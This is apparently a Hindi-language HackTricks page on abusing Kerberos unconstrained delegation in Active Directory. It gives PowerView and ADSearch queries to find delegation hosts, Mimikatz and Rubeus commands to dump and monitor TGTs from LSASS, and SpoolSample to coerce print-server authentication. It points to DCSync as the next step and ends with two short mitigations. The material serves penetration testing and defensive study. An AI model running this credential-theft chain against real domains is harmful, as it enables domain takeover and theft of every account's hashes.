Unconstrained Delegation

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

असीमित डिलीगेशन

यह एक सुविधा है जिसे डोमेन प्रशासक किसी कंप्यूटर पर सेट कर सकता है। फिर, जब भी कोई उपयोगकर्ता कंप्यूटर पर लॉगिन करता है, तो उस उपयोगकर्ता का एक प्रतिलिपि TGT डीसी द्वारा प्रदान किए गए TGS में भेजी जाएगी और LSASS में मेमोरी में सहेजी जाएगी। इसलिए, अगर आपके पास मशीन पर प्रशासक विशेषाधिकार हैं, तो आप टिकट्स को डंप करके उपयोगकर्ताओं का अनुकरण कर सकेंगे।

तो यदि डोमेन प्रशासक "असीमित डिलीगेशन" सुविधा सक्रिय करके किसी कंप्यूटर में लॉगिन करता है, और आपके पास उस मशीन में स्थानीय प्रशासक विशेषाधिकार हैं, तो आप टिकट को डंप करके डोमेन प्रशासक का अनुकरण कहीं भी कर सकेंगे (डोमेन प्राइवेस्क)।

आप इस गुणवत्ता वाले कंप्यूटर ऑब्जेक्ट्स को खोज सकते हैं जांच करके कि userAccountControl विशेषता में ADS_UF_TRUSTED_FOR_DELEGATION शामिल है। आप इसे एलडीएपी फ़िल्टर के साथ कर सकते हैं ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, जो पावरव्यू करता है:

# असीमित कंप्यूटरों की सूची
## पावरव्यू
Get-NetComputer -Unconstrained #डीसी हमेशा दिखाई देते हैं लेकिन प्राइवेस्क के लिए उपयोगी नहीं हैं
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz के साथ टिकट्स निर्यात करें
privilege::debug
sekurlsa::tickets /export #सिफारिश की गई तरीका
kerberos::list /export #एक और तरीका

# लॉगिन को मॉनिटर करें और नए टिकट्स निर्यात करें
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #10 सेकंड में नए TGTs के लिए हर 10 सेकंड जांचें

Mimikatz या Rubeus के साथ प्रशासक (या पीड़ित उपयोगकर्ता) का टिकट मेमोरी में लोड करें पास द टिकट** के लिए**। अधिक जानकारी: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ असीमित डिलीगेशन के बारे में अधिक जानकारी ired.team में।

बल प्रमाणीकरण

यदि एक हमलावर किसी कंप्यूटर को "असीमित डिलीगेशन" के लिए अनुमति देने में सक्षम है, तो वह एक प्रिंट सर्वर को धोखा दे सकता है कि वह खुद को स्वचालित रूप से लॉगिन करेगा जिससे सर्वर की मेमोरी में एक TGT सहेजा जाएगा। फिर, हमलावर उपयोगकर्ता प्रिंट सर्वर कंप्यूटर खाते का अनुकरण करने के लिए पास द टिकट हमला कर सकता है।

किसी भी मशीन के खिलाफ प्रिंट सर्वर लॉगिन करने के लिए आप SpoolSample का उपयोग कर सकते हैं:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

यदि TGT एक डोमेन कंट्रोलर से है, तो आप एक DCSync हमला कर सकते हैं और DC से सभी हैश प्राप्त कर सकते हैं। इस हमले के बारे में अधिक जानकारी ired.team में।

यहाँ अन्य तरीके हैं जिनसे प्रमाणीकरण को मजबूर करने की कोशिश की जा सकती है:

pageForce NTLM Privileged Authentication

संशोधन

  • DA/Admin लॉगिन को विशेष सेवाओं पर सीमित करें

  • विशेषाधिकारी खातों के लिए "खाता संवेदनशील है और यह अनुप्रेषित नहीं किया जा सकता" सेट करें।

Last updated